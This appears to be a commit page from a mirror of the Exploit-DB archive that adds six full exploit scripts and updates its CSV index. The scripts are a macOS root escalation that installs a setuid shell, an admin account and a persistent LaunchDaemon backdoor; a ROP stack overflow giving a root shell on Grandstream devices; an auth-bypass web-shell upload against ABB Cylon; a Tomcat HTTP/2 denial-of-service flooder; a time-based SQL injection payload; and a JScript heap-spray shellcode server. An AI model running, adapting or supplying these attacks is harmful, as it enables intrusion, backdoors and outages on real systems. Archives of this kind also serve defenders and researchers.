bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2025-06-06

Browse source 
7 changes to exploits/shellcodes/ghdb

macOS LaunchDaemon iOS 17.2 - Privilege Escalation

ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)

Apache Tomcat 10.1.39 - Denial of Service (DoS)

Grandstream GSD3710 1.0.11.13 - Stack Overflow

CloudClassroom PHP Project 1.0 - SQL Injection

Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE)
This commit is contained in:
Exploit-DB 2025-06-06 00:16:28 +00:00
parent c3b152279e
commit 2825165fed
7 changed files with 586 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

100
exploits/macos/local/52316.py Executable file
View file

@ -0,0 +1,100 @@
#!/usr/bin/env python3
# Exploit Title: macOS LaunchDaemon iOS 17.2 - Privilege Escalation
# Author: Mohammed Idrees Banyamer (@banyamer_security)
# GitHub: https://github.com/mbanyamer
# Date: 2025-05-31
# Tested on: macOS Sonoma (14.x ARM64 / x86_64)
# CVE: CVE-2025-24085
# Type: Local Privilege Escalation
# Platform: macOS
# Author Country: Jordan
# Description:
# This local privilege escalation exploit leverages a vulnerable macOS LaunchDaemon plist configuration to execute
# arbitrary commands with root privileges. The exploit creates a root payload script that adds a root shell binary,
# creates an admin user, and installs a persistent LaunchDaemon backdoor for root access. It hijacks the
# com.apple.securemonitor LaunchDaemon plist to trigger the payload, allowing unauthorized escalation to root
# on macOS Sonoma systems.
import os
import plistlib
import time
from pathlib import Path
LAUNCHD_PLIST = "/Library/LaunchDaemons/com.apple.securemonitor.plist"
PAYLOAD_SCRIPT = "/tmp/.macroot_payload.sh"
def create_payload():
print("[+] Creating root payload script...")
payload = """#!/bin/bash
# Root shell
cp /bin/bash /tmp/.rootbash
chmod +s /tmp/.rootbash
chown root:wheel /tmp/.rootbash
# Add admin user
sysadminctl -addUser pentest -password macOS123! -admin
# Log file
echo "[+] Root backdoor triggered at $(date)" >> /tmp/.rootlog
# Persistent backdoor
cat <<EOF > /Library/LaunchDaemons/com.apple.backdoor.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key><string>com.apple.backdoor</string>
<key>ProgramArguments</key><array><string>/tmp/.rootbash</string></array>
<key>RunAtLoad</key><true/>
</dict>
</plist>
EOF
chmod 644 /Library/LaunchDaemons/com.apple.backdoor.plist
chown root:wheel /Library/LaunchDaemons/com.apple.backdoor.plist
"""
with open(PAYLOAD_SCRIPT, "w") as f:
f.write(payload)
os.chmod(PAYLOAD_SCRIPT, 0o755)
def hijack_launchdaemon():
print("[+] Hijacking LaunchDaemon plist...")
if not Path(LAUNCHD_PLIST).exists():
# create a fake one
print("[*] Creating fake LaunchDaemon plist for exploitation...")
plist_data = {
'Label': 'com.apple.securemonitor',
'ProgramArguments': [PAYLOAD_SCRIPT],
'RunAtLoad': True,
}
with open(LAUNCHD_PLIST, "wb") as f:
plistlib.dump(plist_data, f)
else:
# hijack existing one
with open(LAUNCHD_PLIST, 'rb') as f:
plist = plistlib.load(f)
plist['ProgramArguments'] = [PAYLOAD_SCRIPT]
plist['RunAtLoad'] = True
with open(LAUNCHD_PLIST, 'wb') as f:
plistlib.dump(plist, f)
os.system(f"chmod 644 {LAUNCHD_PLIST}")
os.system(f"chown root:wheel {LAUNCHD_PLIST}")
def trigger_payload():
print("[+] Triggering LaunchDaemon manually...")
os.system(f"sudo launchctl load -w {LAUNCHD_PLIST}")
print("[+] Done. You can now execute /tmp/.rootbash -p for root shell")
def main():
if os.geteuid() == 0:
print("[!] You are already root. No need to exploit.")
return
create_payload()
hijack_launchdaemon()
print("[+] Exploit completed. Reboot or run manually:")
print(f" sudo launchctl load -w {LAUNCHD_PLIST}")
print(" Then run: /tmp/.rootbash -p")
if __name__ == "__main__":
main()

110
exploits/multiple/remote/52313.py Executable file
View file

@ -0,0 +1,110 @@
#!/usr/bin/env python3
# Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Overflow
# Date: 2025-05-29
# Exploit Author: Pepelux
# Vendor Homepage: https://www.grandstream.com/
# Version: Grandstream GSD3710 - firmware:1.0.11.13 and lower
# Tested on: Linux and MacOS
# CVE: CVE-2022-2025
"""
Author: Jose Luis Verdeguer (@pepeluxx)
Required: Pwntools
Example:
$ python 3 CVE-2022-2025.py -i DEVICE_IP -u USER -p PASSWORD
"""
from struct import pack
import sys
from time import sleep
import argparse
from pwn import *
def get_args():
parser = argparse.ArgumentParser(
formatter_class=lambda prog: argparse.RawDescriptionHelpFormatter(
prog, max_help_position=50))
# Add arguments
parser.add_argument('-i', '--ip', type=str, required=True,
help='device IP address', dest="ip")
parser.add_argument('-u', '--user', type=str, required=True,
help='username', dest="user")
parser.add_argument('-p', '--pass', type=str, required=True,
help='password', dest="pwd")
# Array for all arguments passed to script
args = parser.parse_args()
try:
ip = args.ip
user = args.user
pwd = args.pwd
return ip, user, pwd
except ValueError:
exit()
def check_badchars(payload):
for i in range(5, len(payload)):
if payload[i] in [0xd, 0xa, 0x3b, 0x7c, 0x20]:
log.warn("Badchar %s detected at %#x" % (hex(payload[i]), i))
return True
return False
def main():
ip, user, pwd = get_args()
libc_base = 0x76bb8000
gadget = libc_base + 0x5952C # 0x0005952c: pop {r0, r4, pc};
bin_sh = libc_base + 0xCEA9C # /bin/sh
system = libc_base + 0x2C7FD # 0x0002c7fd # system@libc
exit = libc_base + 0x2660C
print("[*] Libc base: %#x" % libc_base)
print("[*] ROP gadget: %#x" % gadget)
print("[*] /bin/sh: %#x" % bin_sh)
print("[*] system: %#x" % system)
print("[*] exit: %#x\n" % exit)
padding = b"A" * 320
payload = b'ping '
payload += padding
payload += p32(gadget)
payload += p32(bin_sh)
payload += b"AAAA"
payload += p32(system)
payload += p32(exit)
if check_badchars(payload):
sys.exit(0)
count = 1
while True:
print('Try: %d' % count)
s = ssh(user, ip, 22, pwd)
p = s.shell(tty=False)
print(p.readuntil(b"GDS3710> "))
p.sendline(payload)
p.sendline(b"id")
sleep(1)
data = p.read()
if str(data).find('root') > -1:
print('PWNED!')
p.interactive()
s.close()
sys.exit()
s.close()
count += 1
if __name__ == '__main__':
main()

97
exploits/multiple/remote/52317.txt Normal file
View file

@ -0,0 +1,97 @@
ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.04
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: ABB Cylon Aspect BMS/BAS is vulnerable to a critical flaw in the
AuthenticatedHttpServlet within its application server, enabling
remote attackers to bypass authentication by setting the Host:
127.0.0.1 header. This deceives the server into processing requests
as if they originate from localhost, granting unauthorized access
to privileged operations. This bypass grants access to privileged
functionality, including the DeploymentServlet, which is vulnerable
to directory traversal. By leveraging this, an attacker can write
arbitrary PHP files outside the intended directory scope. When combined,
these issues allow remote attackers to upload a malicious PHP shell
and execute system commands with the privileges of the web server,
leading to full system compromise.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5954
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5954.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl "http://192.168.73.31:7226/servlets/DeploymentServlet\
> ?RequestType=DeploySource\
> &filename=../../../home/MIX_CMIX/htmlroot/zsl.php\
> &directory=/" \
> --data-binary @zsl.php \
> -H "Host: 127.0.0.1" \
> -H "Content-Type: application/octet-stream"
<HTML><HEAD><TITLE>200 Successful</TITLE></HEAD><BODY>200 Successful</BODY></HTML>
$ curl http://192.168.73.31/zsl.php?cmd=id;ls -al zsl.php
uid=48(apache) gid=48(apache) groups=48(apache),0(root) context=system_u:system_r:httpd_t:s0
-rw-r--r--. 1 root root 106 Jun 4 13:29 zsl.php

143
exploits/multiple/remote/52318.py Executable file
View file

@ -0,0 +1,143 @@
# Exploit Title: Apache Tomcat 10.1.39 - Denial of Service (DOS)
# Author: Abdualhadi khalifa
# CVE: CVE-2025-31650
import httpx
import asyncio
import random
import urllib.parse
import sys
import socket
from colorama import init, Fore, Style
init()
class TomcatKiller:
def __init__(self):
self.success_count = 0
self.error_count = 0
self.invalid_priorities = [
\\\"u=-1, q=2\\\",
\\\"u=4294967295, q=-1\\\",
\\\"u=-2147483648, q=1.5\\\",
\\\"u=0, q=invalid\\\",
\\\"u=1/0, q=NaN\\\",
\\\"u=1, q=2, invalid=param\\\",
\\\"\\\",
\\\"u=1, q=1, u=2\\\",
\\\"u=99999999999999999999, q=0\\\",
\\\"u=-99999999999999999999, q=0\\\",
\\\"u=, q=\\\",
\\\"u=1, q=1, malformed\\\",
\\\"u=1, q=, invalid\\\",
\\\"u=-1, q=4294967295\\\",
\\\"u=invalid, q=1\\\",
\\\"u=1, q=1, extra=\\\",
\\\"u=1, q=1; malformed\\\",
\\\"u=1, q=1, =invalid\\\",
\\\"u=0, q=0, stream=invalid\\\",
\\\"u=1, q=1, priority=recursive\\\",
\\\"u=1, q=1, %invalid%\\\",
\\\"u=0, q=0, null=0\\\",
]
async def validate_url(self, url):
try:
parsed_url = urllib.parse.urlparse(url)
if not parsed_url.scheme or not parsed_url.hostname:
raise ValueError(\\\"Invalid URL format. Use http:// or https://\\\")
host = parsed_url.hostname
port = parsed_url.port if parsed_url.port else (443 if parsed_url.scheme == \\\'https\\\' else 80)
return host, port
except Exception:
print(f\\\"{Fore.RED}Error: Invalid URL. Use http:// or https:// format.{Style.RESET_ALL}\\\")
sys.exit(1)
async def check_http2_support(self, host, port):
async with httpx.AsyncClient(http2=True, verify=False, timeout=5, limits=httpx.Limits(max_connections=1000)) as client:
try:
response = await client.get(f\\\"https://{host}:{port}/\\\", headers={\\\"user-agent\\\": \\\"TomcatKiller\\\"})
if response.http_version == \\\"HTTP/2\\\":
print(f\\\"{Fore.GREEN}HTTP/2 supported! Proceeding ...{Style.RESET_ALL}\\\")
return True
else:
print(f\\\"{Fore.YELLOW}Error: HTTP/2 not supported. This exploit requires HTTP/2.{Style.RESET_ALL}\\\")
return False
except Exception:
print(f\\\"{Fore.RED}Error: Could not connect to {host}:{port}.{Style.RESET_ALL}\\\")
return False
async def send_invalid_priority_request(self, host, port, num_requests, task_id):
async with httpx.AsyncClient(http2=True, verify=False, timeout=0.3, limits=httpx.Limits(max_connections=1000)) as client:
url = f\\\"https://{host}:{port}/\\\"
for i in range(num_requests):
headers = {
\\\"priority\\\": random.choice(self.invalid_priorities),
\\\"user-agent\\\": f\\\"TomcatKiller-{task_id}-{random.randint(1, 1000000)}\\\",
\\\"cache-control\\\": \\\"no-cache\\\",
\\\"accept\\\": f\\\"*/*; q={random.random()}\\\",
}
try:
await client.get(url, headers=headers)
self.success_count += 1
except Exception:
self.error_count += 1
async def monitor_server(self, host, port):
while True:
try:
with socket.create_connection((host, port), timeout=2):
print(f\\\"{Fore.YELLOW}Target {host}:{port} is reachable.{Style.RESET_ALL}\\\")
except Exception:
print(f\\\"{Fore.RED}Target {host}:{port} unreachable or crashed!{Style.RESET_ALL}\\\")
break
await asyncio.sleep(2)
async def run_attack(self, host, port, num_tasks, requests_per_task):
print(f\\\"{Fore.GREEN}Starting attack on {host}:{port}...{Style.RESET_ALL}\\\")
print(f\\\"Tasks: {num_tasks}, Requests per task: {requests_per_task}\\\")
print(f\\\"{Fore.YELLOW}Monitor memory manually via VisualVM or check catalina.out for OutOfMemoryError.{Style.RESET_ALL}\\\")
monitor_task = asyncio.create_task(self.monitor_server(host, port))
tasks = [self.send_invalid_priority_request(host, port, requests_per_task, i) for i in range(num_tasks)]
await asyncio.gather(*tasks)
monitor_task.cancel()
total_requests = num_tasks * requests_per_task
success_rate = (self.success_count / total_requests * 100) if total_requests > 0 else 0
print(f\\\"\\\\n{Fore.MAGENTA}===== Attack Summary ====={Style.RESET_ALL}\\\")
print(f\\\"Target: {host}:{port}\\\")
print(f\\\"Total Requests: {total_requests}\\\")
print(f\\\"Successful Requests: {self.success_count}\\\")
print(f\\\"Failed Requests: {self.error_count}\\\")
print(f\\\"Success Rate: {success_rate:.2f}%\\\")
print(f\\\"{Fore.MAGENTA}========================={Style.RESET_ALL}\\\")
async def main():
print(f\\\"{Fore.BLUE}===== TomcatKiller - CVE-2025-31650 ====={Style.RESET_ALL}\\\")
print(f\\\"Developed by: @absholi7ly\\\")
print(f\\\"Exploits memory leak in Apache Tomcat (10.1.10-10.1.39) via invalid HTTP/2 priority headers.\\\")
print(f\\\"{Fore.YELLOW}Warning: For authorized testing only. Ensure HTTP/2 and vulnerable Tomcat version.{Style.RESET_ALL}\\\\n\\\")
url = input(f\\\"{Fore.CYAN}Enter target URL (e.g., https://localhost:8443): {Style.RESET_ALL}\\\")
num_tasks = int(input(f\\\"{Fore.CYAN}Enter number of tasks (default 300): {Style.RESET_ALL}\\\") or 300)
requests_per_task = int(input(f\\\"{Fore.CYAN}Enter requests per task (default 100000): {Style.RESET_ALL}\\\") or 100000)
tk = TomcatKiller()
host, port = await tk.validate_url(url)
if not await tk.check_http2_support(host, port):
sys.exit(1)
await tk.run_attack(host, port, num_tasks, requests_per_task)
if __name__ == \\\"__main__\\\":
try:
asyncio.run(main())
print(f\\\"{Fore.GREEN}Attack completed!{Style.RESET_ALL}\\\")
except KeyboardInterrupt:
print(f\\\"{Fore.YELLOW}Attack interrupted by user.{Style.RESET_ALL}\\\")
sys.exit(0)
except Exception as e:
print(f\\\"{Fore.RED}Unexpected error: {e}{Style.RESET_ALL}\\\")
sys.exit(1)

22
exploits/php/webapps/52314.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: CloudClassroom PHP Project 1.0 - SQL Injection
# Google Dork: inurl:CloudClassroom-PHP-Project-master
# Date: 2025-05-30
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://github.com/mathurvishal/CloudClassroom-PHP-Project
# Software Link: https://github.com/mathurvishal/CloudClassroom-PHP-Project/archive/refs/heads/master.zip
# Version: 1.0
# Tested on: XAMPP on Windows 10 / Ubuntu 22.04
# CVE : CVE-2025-45542
# Description:
# A time-based blind SQL injection vulnerability exists in the pass parameter
# of the registrationform endpoint. An attacker can exploit this issue by sending
# a malicious POST request to delay server response and infer data.
# PoC Request (simulated using curl):
curl -X POST http://localhost/CloudClassroom-PHP-Project-master/registrationform \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "addrs=3137%20Laguna%20Street&course=1&dob=1967/1/1&email=testing@example.com&faname=test&fname=test&gender=Female&lname=test&pass=u]H[ww6KrA9F.x-F0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z&phno=94102&sub="
# The server response will be delayed if the SQL condition is true, confirming the injection point.

108
exploits/windows/remote/52315.py Executable file
View file

@ -0,0 +1,108 @@
#!/usr/bin/env python3
# Exploit Title: Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE)
# Exploit Author: Mohammed Idrees Banyamer
# Instagram: @@banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-05-31
# CVE: CVE-2025-30397
# Vendor: Microsoft
# Affected Versions: Windows Server 2025 (build 25398 and prior)
# Tested on: Windows Server 2025 + IE11 (x86)
# Type: Remote
# Platform: Windows
# Vulnerability Type: Use-After-Free (JScript Engine)
# Description: This PoC exploits a Use-After-Free vulnerability in jscript.dll to achieve code execution via heap spraying. The shellcode executes calc.exe as a demonstration of code execution.
# ============================
# Usage Instructions:
#
# 1. Save this script as `exploit_server.py`.
# 2. Run it with Python 3:
# $ python3 exploit_server.py
# 3. On the vulnerable target (Windows Server 2025 + IE11):
# Open Internet Explorer and navigate to:
# http://<attacker-ip>:8080/poc_cve_2025_30397.html
#
# If the target is vulnerable, calc.exe will be executed.
# ============================
import http.server
import socketserver
PORT = 8080
HTML_CONTENT = b"""<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>PoC - CVE-2025-30397</title>
<script>
var payload = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
while (payload.length < 0x1000) payload += payload;
var shell = unescape(
"%u9090%u9090%uebfc%u5eeb%u31b8%u64c9%u8b8b%u3050%u8b0c%u8b70" +
"%u3c4a%u780c%u4f0a%u4b8b%u1c70%u8b1c%u8b6c%u0c5c%u8b14%u285c" +
"%uef01%u528b%u8b10%u3c0a%u758b%u1c28%u8b34%u5c6a%u0158%uc985" +
"%u75c9%u8b58%u8b10%u3c20%u418b%u0348%u408b%u8b34%u1c4a%uc085" +
"%u7401%u0343%u0c6a%u58eb%ue8d0%uff00%u6361%u6c63%u2e00%u6578" +
"%u0065"
);
var final = payload + shell;
var buffer = [];
for (var i = 0; i < 1500; i++) buffer[i] = final.substring(0);
var sprayTarget = document.createElement("iframe");
sprayTarget.setAttribute("src", "about:blank");
document.body.appendChild(sprayTarget);
for (var i = 0; i < 200; i++) {
try {
sprayTarget.contentWindow.eval("var a = '" + final + "'");
} catch (e) {}
}
for (var j = 0; j < 1000; j++) {
var obj = document.createElement("div");
obj.innerHTML = "EXPLOIT" + j;
document.body.appendChild(obj);
}
var victim = document.createElement("object");
victim.setAttribute("classid", "clsid:0002DF01-0000-0000-C000-000000000046");
document.body.appendChild(victim);
alert("PoC loaded. If vulnerable, calc.exe will launch.");
</script>
</head>
<body>
<h1 style="color:red;">Exploit PoC: CVE-2025-30397</h1>
<h2>Author: Mohammed Idrees Banyamer</h2>
<h3>Instagram: <a href="https://instagram.com/mbanyamer" target="_blank">@banyamer_security</a></h3>
<h3>GitHub: <a href="https://github.com/mbanyamer" target="_blank">mbanyamer</a></h3>
<p>This demonstration is for ethical testing only. Triggering the vulnerability on vulnerable Internet Explorer installations will lead to execution of calc.exe via shellcode.</p>
</body>
</html>
"""
class Handler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if self.path == '/' or self.path == '/poc_cve_2025_30397.html':
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Content-length", str(len(HTML_CONTENT)))
self.send_header("X-Content-Type-Options", "nosniff")
self.send_header("X-Frame-Options", "SAMEORIGIN")
self.send_header("Content-Security-Policy", "default-src 'self'")
self.send_header("Cache-Control", "no-cache, no-store, must-revalidate")
self.send_header("Pragma", "no-cache")
self.send_header("Expires", "0")
self.end_headers()
self.wfile.write(HTML_CONTENT)
else:
self.send_error(404, "File Not Found")
def run():
print(f"Serving PoC on http://0.0.0.0:{PORT}/poc_cve_2025_30397.html")
with socketserver.TCPServer(("", PORT), Handler) as httpd:
try:
httpd.serve_forever()
except KeyboardInterrupt:
print("\nServer stopped.")
if __name__ == "__main__":
run()

6
files_exploits.csv
View file

@ -9268,6 +9268,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47708,exploits/macos/local/47708.txt,"macOS 10.14.6 - root->kernel Privilege Escalation via update_dyld_shared_cache",2019-11-22,"Google Security Research",local,macos,,2019-11-22,2019-11-22,1,,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1929
47400,exploits/macos/local/47400.md,"macOS 18.7.0 Kernel - Local Privilege Escalation",2019-09-19,A2nkF,local,macos,,2019-09-19,2019-09-19,0,,,,,,https://github.com/A2nkF/macOS-Kernel-Exploit/tree/81765a91cd299b6c05fd3edf7afe557405c949fa
48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos,,2020-05-12,2020-05-12,0,,,,,,
52316,exploits/macos/local/52316.py,"macOS LaunchDaemon iOS 17.2 - Privilege Escalation",2025-06-05,"Mohammed Idrees Banyamer",local,macos,,2025-06-05,2025-06-05,0,CVE-2025-24085,,,,,
43217,exploits/macos/local/43217.sh,"Murus 1.4.11 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,,2017-12-06,2017-12-06,0,,Local,,,http://www.exploit-db.commurus-1.4.11.zip,https://m4.rkw.io/blog/murus-firewall-1411-escalation-hihack--root-privesc.html
41854,exploits/macos/local/41854.txt,"Proxifier for Mac 2.17/2.18 - Privesc Escalation",2017-04-11,"Mark Wadham",local,macos,,2017-04-11,2017-04-12,0,CVE-2017-7643,Local,,,,https://m4.rkw.io/blog/cve20177643-local-root-privesc-in-proxifier-for-mac--218.html
41853,exploits/macos/local/41853.txt,"Proxifier for Mac 2.18 - Multiple Vulnerabilities",2017-04-11,Securify,local,macos,,2017-04-11,2017-04-11,0,,,,,,https://www.securify.nl/advisory/SFY20170401/multiple_local_privilege_escalation_vulnerabilities_in_proxifier_for_mac.html
@ -10622,6 +10623,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
31921,exploits/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",remote,multiple,,2008-06-16,2014-02-26,1,CVE-2008-2822;OSVDB-46155,,,,,https://www.securityfocus.com/bid/29749/info
32167,exploits/multiple/remote/32167.txt,"8E6 Technologies R3000 - Host Header Internet Filter Security Bypass",2008-08-05,nnposter,remote,multiple,,2008-08-05,2014-03-11,1,CVE-2008-3494;OSVDB-47517,,,,,https://www.securityfocus.com/bid/30541/info
52305,exploits/multiple/remote/52305.py,"ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation",2025-05-25,LiquidWorm,remote,multiple,,2025-05-25,2025-05-25,0,CVE-n/a,,,,,
52317,exploits/multiple/remote/52317.txt,"ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)",2025-06-05,LiquidWorm,remote,multiple,,2025-06-05,2025-06-05,0,CVE-n/a,,,,,
25019,exploits/multiple/remote/25019.txt,"ABC2MIDI 2004-12-04 - Multiple Stack Buffer Overflow Vulnerabilities",2004-12-15,"Limin Wang",remote,multiple,,2004-12-15,2013-04-30,1,CVE-2004-1256;OSVDB-12426,,,,,https://www.securityfocus.com/bid/12019/info
25018,exploits/multiple/remote/25018.txt,"ABC2MTEX 1.6.1 - Process ABC Key Field Buffer Overflow",2004-12-15,"Limin Wang",remote,multiple,,2004-12-15,2013-04-30,1,,,,,,https://www.securityfocus.com/bid/12018/info
32382,exploits/multiple/remote/32382.txt,"Accellion File Transfer Appliance Error Report Message - Open Email Relay",2008-09-15,"Eric Beaulieu",remote,multiple,,2008-09-15,2014-03-20,1,CVE-2008-7012;OSVDB-48242,,,,,https://www.securityfocus.com/bid/31178/info
@ -10742,6 +10744,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9994,exploits/multiple/remote/9994.txt,"Apache Tomcat - Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",remote,multiple,,2009-11-08,,1,,,,,,
9995,exploits/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication 'Username' Enumeration",2009-11-09,"D. Matscheko",remote,multiple,,2009-11-08,,1,,,,,,
27095,exploits/multiple/remote/27095.txt,"Apache Tomcat / Geronimo 1.0 - 'Sample Script cal2.jsp?time' Cross-Site Scripting",2006-01-16,"Oliver Karow",remote,multiple,,2006-01-16,2013-07-25,1,CVE-2006-0254;OSVDB-22458,,,,,https://www.securityfocus.com/bid/16260/info
52318,exploits/multiple/remote/52318.py,"Apache Tomcat 10.1.39 - Denial of Service (DoS)",2025-06-05,"Abdualhadi khalifa",remote,multiple,,2025-06-05,2025-06-05,0,CVE-2025-31650,,,,,
20131,exploits/multiple/remote/20131.txt,"Apache Tomcat 3.1 - Path Revealing",2000-07-20,"ET LoWNOISE",remote,multiple,,2000-07-20,2012-07-31,1,CVE-2000-0759;OSVDB-674,,,,,https://www.securityfocus.com/bid/1531/info
33379,exploits/multiple/remote/33379.txt,"Apache Tomcat 3.2 - 404 Error Page Cross-Site Scripting",2009-09-02,MustLive,remote,multiple,,2009-09-02,2014-05-16,1,,,,,,https://www.securityfocus.com/bid/37149/info
21492,exploits/multiple/remote/21492.txt,"Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree",2002-05-29,"Richard Brain",remote,multiple,,2002-05-29,2017-07-11,1,CVE-2002-2007;OSVDB-13304,,,,,https://www.securityfocus.com/bid/4878/info
@ -11000,6 +11003,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
39292,exploits/multiple/remote/39292.pl,"Granding MA300 - Traffic Sniffing Man In The Middle Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",remote,multiple,,2014-08-26,2018-01-11,1,CVE-2014-5380;OSVDB-110460,,,,,https://www.securityfocus.com/bid/69390/info
39293,exploits/multiple/remote/39293.pl,"Granding MA300 - Weak Pin Encryption Brute Force",2014-08-26,"Eric Sesterhenn",remote,multiple,,2014-08-26,2016-01-22,1,CVE-2014-5381;OSVDB-110456,,,,,https://www.securityfocus.com/bid/69390/info
52303,exploits/multiple/remote/52303.py,"Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow",2025-05-25,Pepelux,remote,multiple,,2025-05-25,2025-05-25,0,CVE-2022-2070,,,,,
52313,exploits/multiple/remote/52313.py,"Grandstream GSD3710 1.0.11.13 - Stack Overflow",2025-06-05,Pepelux,remote,multiple,,2025-06-05,2025-06-05,0,CVE-2022-2025,,,,,
33203,exploits/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x - WHERE Clause Security Bypass",2009-09-02,"Johannes Dahse",remote,multiple,,2009-09-02,2014-05-06,1,CVE-2008-6992;OSVDB-48910,,,,,https://www.securityfocus.com/bid/36209/info
38049,exploits/multiple/remote/38049.txt,"Greenstone - Multiple Vulnerabilities",2012-11-23,AkaStep,remote,multiple,,2012-11-23,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/56662/info
31912,exploits/multiple/remote/31912.txt,"GSC Client 1.00 2067 - Privilege Escalation",2008-06-14,"Michael Gray",remote,multiple,,2014-04-09,2014-04-09,0,CVE-2008-7170;OSVDB-53482,,,,,https://www.securityfocus.com/bid/29718/info
@ -16131,6 +16135,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
11162,exploits/php/webapps/11162.txt,"CLONEBID B2B Marketplace - Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",webapps,php,,2010-01-15,,1,OSVDB-61811,,,,,
47544,exploits/php/webapps/47544.py,"ClonOs WEB UI 19.09 - Improper Access Control",2019-10-25,"İbrahim Hakan Şeker",webapps,php,,2019-10-25,2019-10-25,0,CVE-2019-18418,,,,,
30070,exploits/php/webapps/30070.html,"ClonusWiki 0.5 - 'index.php' HTML Injection",2007-05-22,"John Martinelli",webapps,php,,2007-05-22,2013-12-06,1,,,,,,https://www.securityfocus.com/bid/24101/info
